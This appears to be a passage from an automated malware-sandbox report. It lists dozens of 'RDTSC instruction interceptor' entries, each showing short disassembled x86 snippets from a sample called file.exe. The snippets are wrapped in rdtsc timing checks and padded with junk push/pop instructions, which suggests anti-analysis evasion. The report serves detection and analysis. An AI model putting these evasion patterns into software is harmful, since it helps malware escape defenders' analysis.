                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF051D second address: FF052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F672053310Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF052A second address: FD5B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov cx, dx 0x00000009 call dword ptr [ebp+122D2D25h] 0x0000000f jc 00007F67208644DEh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF05EA second address: FF05F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0AAB second address: FF0AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0C7B second address: FF0C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0C86 second address: FF0C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DB1 second address: FF0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DC0 second address: FF0DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DC4 second address: FF0DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DC8 second address: FF0DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DD1 second address: FF0DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007F672053310Eh 0x0000000e jbe 00007F6720533108h 0x00000014 push edi 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1017 second address: FF101B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF101B second address: FF1060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6720533108h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 or di, 8DB8h 0x00000015 or ecx, 5EA925C3h 0x0000001b push 00000004h 0x0000001d mov dword ptr [ebp+122D22F6h], edi 0x00000023 nop 0x00000024 jo 00007F6720533118h 0x0000002a jmp 00007F6720533112h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 push ebx 0x00000034 pop ebx 0x00000035 pop ecx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF146C second address: FF1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1767 second address: FF176C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF176C second address: FF1772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1772 second address: FF1786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6720533106h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF17D2 second address: FF17DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F67208644C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF17DC second address: FF1823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D1CC8h], ebx 0x00000011 lea eax, dword ptr [ebp+1248226Dh] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F6720533108h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 nop 0x00000032 pushad 0x00000033 push esi 0x00000034 je 00007F6720533106h 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push ecx 0x0000003e pop ecx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1823 second address: FF1837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F67208644C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1837 second address: FF183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D17D second address: 102D181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D30B second address: 102D30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D30F second address: 102D31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F67208644CAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D31F second address: 102D33A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6720533112h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D470 second address: 102D47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67208644C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D47B second address: 102D481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D481 second address: 102D485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D485 second address: 102D48F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D48F second address: 102D495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D495 second address: 102D499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D6F4 second address: 102D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D6F8 second address: 102D70A instructions: 0x00000000 rdtsc 0x00000002 js 00007F6720533106h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D70A second address: 102D71A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F67208644C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D71A second address: 102D71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DB5C second address: 102DB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F67208644C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DB68 second address: 102DB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032FFC second address: 1033008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007F67208644C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033008 second address: 103300C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033134 second address: 103313A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103313A second address: 1033157 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F672053310Dh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033743 second address: 1033754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033754 second address: 103375A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103375A second address: 1033760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033760 second address: 103378D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F6720533112h 0x0000000e jns 00007F6720533106h 0x00000014 jc 00007F6720533106h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edx 0x0000001d jmp 00007F672053310Ah 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033D1B second address: 1033D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F67208644D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033D2D second address: 1033D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1037095 second address: 10370B4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F67208644C6h 0x00000008 jmp 00007F67208644D5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10370B4 second address: 10370B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10370B9 second address: 10370F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644D6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jmp 00007F67208644CDh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10370F3 second address: 10370FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10369BE second address: 10369D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c jg 00007F67208644CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036DD6 second address: 1036DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6720533110h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036DEF second address: 1036DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10396D6 second address: 103970C instructions: 0x00000000 rdtsc 0x00000002 js 00007F6720533108h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F6720533112h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6720533116h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103970C second address: 1039713 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB48BC second address: FB48C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F6720533106h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB48C9 second address: FB48D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F67208644CAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC306 second address: FAC315 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6720533106h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC315 second address: FAC328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F67208644CAh 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EA6D second address: 103EA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F672053310Eh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EA82 second address: 103EAB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F67208644CBh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F67208644D5h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 jl 00007F67208644C6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EE31 second address: 103EE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1266 second address: FF12D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F67208644C6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jne 00007F67208644D8h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F67208644C8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000004h 0x00000032 push esi 0x00000033 mov edi, dword ptr [ebp+122D2910h] 0x00000039 pop edx 0x0000003a nop 0x0000003b jmp 00007F67208644D4h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 je 00007F67208644C8h 0x00000049 push esi 0x0000004a pop esi 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12D9 second address: FF12DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12DF second address: FF12E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12E3 second address: FF12E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F114 second address: 103F12E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F67208644D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F12E second address: 103F174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6720533117h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6720533112h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F174 second address: 103F178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F178 second address: 103F17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FD88 second address: 103FD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FD8E second address: 103FD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FD95 second address: 103FDBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67208644D6h 0x00000009 jmp 00007F67208644CCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FDBB second address: 103FDC5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6720533106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043F44 second address: 1043F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043F4A second address: 1043F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6720533106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043477 second address: 104347B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10438EA second address: 1043903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6720533115h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043903 second address: 1043907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043907 second address: 104392E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F672053311Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104392E second address: 1043934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043934 second address: 104393A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104393A second address: 1043957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007F67208644CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043957 second address: 104395D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104395D second address: 1043961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10464FD second address: 104651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533110h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F672053310Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046645 second address: 1046649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046A6F second address: 1046A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046A75 second address: 1046A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046A79 second address: 1046A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F672053310Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046A8B second address: 1046AB8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F67208644DFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F67208644E9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050EAB second address: 1050EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104ED9E second address: 104EDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EDA2 second address: 104EDBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F672053310Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EF36 second address: 104EF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
